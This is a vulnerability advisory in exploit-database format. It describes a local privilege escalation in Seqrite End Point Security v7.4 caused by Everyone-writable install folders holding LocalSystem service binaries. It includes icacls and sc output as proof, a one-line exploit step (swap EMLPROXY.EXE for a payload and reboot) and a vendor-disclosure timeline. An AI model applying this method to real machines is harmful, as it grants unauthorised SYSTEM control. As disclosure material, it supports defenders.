# Exploit Title      : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation
# Date               : 09/13/2018
# Exploit Author     : Hashim Jawad - @ihack4falafel
# Vendor Homepage    : https://www.seqrite.com/
# Tested on          : Windows 7 Enterprise SP1 (x64)

Description:
============
Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite" with very weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's subfolders. In addition, the program installs handful of services with binaries within the program folder that run as "LocalSystem". Given the "Self Protection" feature (on by default) is disabled which can be done in number of ways (for instance, if the policy does not enforce EPS client password to change the settings any user can disable that feature), meaning a non-privileged user would be able to elevate privileges to "NT AUTHORITY\SYSTEM".

Proof:
======
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
                                 Everyone:(CI)(F)
                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Users:(I)(RX)
                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Core Mail Protection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Core Mail Protection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

c:\>

Exploit:
========
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.

# Disclosure Timeline:
# ====================
# 09-14-18: Contacted vendor, no response
# 09-21-18: Contacted vendor, no response
# 09-28-18: Vulnerability published